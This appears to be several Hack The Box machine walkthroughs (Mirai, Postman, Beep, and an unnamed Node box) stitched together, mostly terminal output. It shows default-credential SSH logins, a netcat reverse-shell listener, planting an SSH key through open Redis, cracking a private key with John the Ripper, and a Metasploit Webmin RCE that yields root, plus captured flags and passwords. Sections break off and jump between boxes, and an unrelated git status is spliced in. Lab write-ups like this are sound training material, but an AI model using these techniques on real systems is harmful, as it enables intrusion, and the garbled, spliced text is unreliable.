Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Mirai.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.48 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 09:35 EEST
Nmap scan report for 10.10.10.48
Host is up (0.033s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1050/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.07 seconds
We found an admin console in 10.10.10.48/admin/.
The name of the service is Pi-hole.
The default password for Pi-holeis pi:raspberry.
We can use it for the SSH login.
root@kali:~# sshpass -p raspberry ssh pi@10.10.10.48
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 06:49:57 2020 from 10.10.14.32
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type'passwd' to set a new password.
pi@raspberrypi:~ $
Now we got an user pi. user.txt is in a directory /home/pi/Desktop.
Using sudo -l, we can find out that we can run any command with root privilege.
pi@raspberrypi:~ $ sudo-l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Change the user and go to /root.
We have root.txt which says we don’t have the flag here.
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Using df -h, we can find out /dev/sdb is mounted on /media/usbstick.
Then, go to /media/usbstick.
There is an interesting file damnit.txt.
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Sounds root.txt has been deleted already.
We can find the flag by running strings.
root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
root@kali:~# ssh mark@10.10.10.58
mark@10.10.10.58's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'`-..-()`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ id
uid=1001(mark)gid=1001(mark)groups=1001(mark)
However, we are still not capable of getting user.txt.
We have other 2 users.
mark@node:/home$ ls-l
total 12
drwxr-xr-x 2 root root 4096 Aug 31 2017 frank
drwxr-xr-x 3 root root 4096 Sep 3 2017 mark
drwxr-xr-x 6 root root 4096 Sep 3 2017 tom
If take a look at the processes, we can see 2 processes by another user “tom”.
mark@node:~$ ps aux | grep tom
tom 1211 0.0 5.8 1074616 44232 ? Ssl 19:31 0:03 /usr/bin/node /var/scheduler/app.js
tom 1231 0.0 6.6 1024156 50068 ? Ssl 19:31 0:04 /usr/bin/node /var/www/myplace/app.js
mark 1610 0.0 0.1 14228 1020 pts/0 S+ 23:05 0:00 grep--color=auto tom
Using the following command, we can access the command line interface of MongoDB.
Also it is possible to insert reverse shell command.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
After a few minutes, we can get a reverse shell as user “tom”.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN)[10.10.10.58] 38860
bash: cannot set terminal process group (1230): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root"for details.
tom@node:/$ id
id
uid=1000(tom)gid=1000(tom)groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
user.txt is in the directory “/home/tom”.
tom@node:/$ cd /home/tom
cd /home/tom
tom@node:~$ ls
ls
user.txt
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1
3. Getting Root
With the following command, we can find a binary file “/usr/local/bin/backup”
$ git status
On branch Github-LFS
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)(use "git restore <file>..." to discard changes in working directory)
modified: public/images/2017-09-21/gcc-1.png
modified: public/images/2017-09-21/gcc-2.png
modified: public/images/2017-09-21/gcc-3.png
modified: public/images/2018-12-01/2018-12-05-09-49-17.png
modified: public/images/2018-12-01/2018-12-05-09-50-24.png
---
Then, commit and push the branch.
We see some diagnostic information about .png file upload.
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Postman”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.160 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 18:54 EET
Nmap scan report for 10.10.10.160
Host is up (0.043s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html;Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.81 seconds
1n4r1@kali:~$ redis-cli -h 10.10.10.160
10.10.10.160:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:616
run_id:521dd2981efd190099f6fdc8744a20a1b3217664
tcp_port:6379
uptime_in_seconds:444
uptime_in_days:0
hz:10
lru_clock:7323466
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
---
10.10.10.160:6379> keys *(empty list or set)
0.10.10.160:6379> config get *
1)"dbfilename"
2)"dump.rdb"
3)"requirepass"
4)""
5)"masterauth"
6)""
7)"cluster-announce-ip"
8)""
9)"unixsocket"---
2. Summary
Port 22: OpenSSH running
Port 80: HTTP website running with Apache
Port 6379: Redis 4.0.9 running (anonymous access allowed)
Port 10000: Webmin httpd running
3. Getting User
Since we have access to redis, we can enumerate the file system with the following way.
As you can see, if we set a non-existing directory, it shows “No such file or directory”.
10.10.10.160:6379> config get dir
1)"dir"
2)"/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/non-exist-directory
(error) ERR Changing directory: No such file or directory
This time, we can find a directory for ssh in the home directory of redis user.
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379>
root@kali:~# cat pubkey.txt | redis-cli -h 10.10.10.160 -xset pubkey
OK
After that, save the key into the “/var/lib/redis/.ssh/authorized_keys”.
root@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379>
Now we can SSH into the server as an user redis.
However, we don’t have the “user.txt” in the home directory of redis user.
root@kali:~# ssh redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$
With some enumeration, we can find an interesting file “id_rsa.bak” in the “/opt” directory.
Kali Linux can brute-force the password of a SSH private key with the John the Ripper.
However, we need to change the SSH private key into the hash which format is crackable by John the Ripper.
By cracking with “rockyou.txt”, we can achieve a password “computer2008” for someone.
root@kali:~# /usr/share/john/ssh2john.py id_rsa.bak > hash.txt
root@kali:~# john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash(SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa.bak)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:06 DONE (2020-03-15 10:55) 0.1468g/s 2105Kp/s 2105Kc/s 2105KC/sa6_123..*7¡Vamos!
Session completed
Actually, we have only one user “Matt” who is allowed to log in except redis.
This time, we can’t SSH but we can run su command to be the user “Matt”.
We still have one service that we haven’t looked through with is “Webmin httpd”.
For the privilege escalation, we can use the credential for Matt again.
By trying the credential for Matt, we can confirm that the credential for Matt is available for the authentication.
Matt:computer2008
Also, we can search the vulnerability for the Webmin v1.9.1 with searchsploit.
For the Webmin 1.9.10, we have one vulnerability “Webmin 1.910 - ‘Package Updates’ Remote Command Execution”.
By using the previous username and password, we can get a root shell.
Also, with the common python method, we can achieve an interactive full shell.
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce)>set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce)>set password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce)>set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce)>set lhost 10.10.14.9
lhost => 10.10.14.9
msf5 exploit(linux/http/webmin_packageup_rce)>set ssl true
ssl =>true
msf5 exploit(linux/http/webmin_packageup_rce)> run
[*] Started reverse TCP handler on 10.10.14.9:4444
[+] Session cookie: 28319cb492d25d1493cbd8a83f732ca8
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.9:4444 -> 10.10.10.160:49658) at 2020-03-16 18:56:54 +0200
id
uid=0(root)gid=0(root)groups=0(root)
python -c"import pty;pty.spawn('/bin/bash')"
root@Postman:/usr/share/webmin/package-updates/#
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Beep”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.7 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 09:55 EET
Nmap scan report for 10.10.10.7
Host is up (0.044s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL STLS EXPIRE(NEVER) APOP TOP IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING RESP-CODES USER LOGIN-DELAY(0)
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ATOMIC LITERAL+ CATENATE ANNOTATEMORE OK CHILDREN IDLE X-NETSCAPE MULTIAPPEND UIDPLUS ID MAILBOX-REFERRALS IMAP4rev1 NAMESPACE LIST-SUBSCRIBED LISTEXT URLAUTHA0001 CONDSTORE UNSELECT Completed SORT=MODSEQ THREAD=ORDEREDSUBJECT THREAD=REFERENCES BINARY SORT RIGHTS=kxte NO STARTTLS RENAME QUOTA IMAP4 ACL
443/tcp open ssl/https?
|_ssl-date: 2020-03-01T09:01:11+00:00; +1h02m01s from scanner time.
880/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1h02m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 382.63 seconds
root@kali:~#
Gobuster HTTP:
root@kali:~# gobuster dir-u http://10.10.10.7/ -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)===============================================================[+] Url: http://10.10.10.7/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/03/01 10:04:30 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.7/23b3f8d9-6290-4f1e-85a5-9a8041a56e20 => 302. To force processing of Wildcard responses, specify the '--wildcard' switch
root@kali:~#
If we grep the word “password”, we can find an interesting parameter.
Now we got the following password.
jEhdIekWmdjE
This time, we can use this password for connecting to SSH.
As always, we have “root.txt” in the directory “/root”.
root@kali:~# ssh root@10.10.10.7
root@10.10.10.7's password:
Last login: Sun Mar 1 19:45:39 2020 from 10.10.14.27
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# cat /root/root.txt
d88e006123842106982acce0aaf453f0
[root@beep ~]#
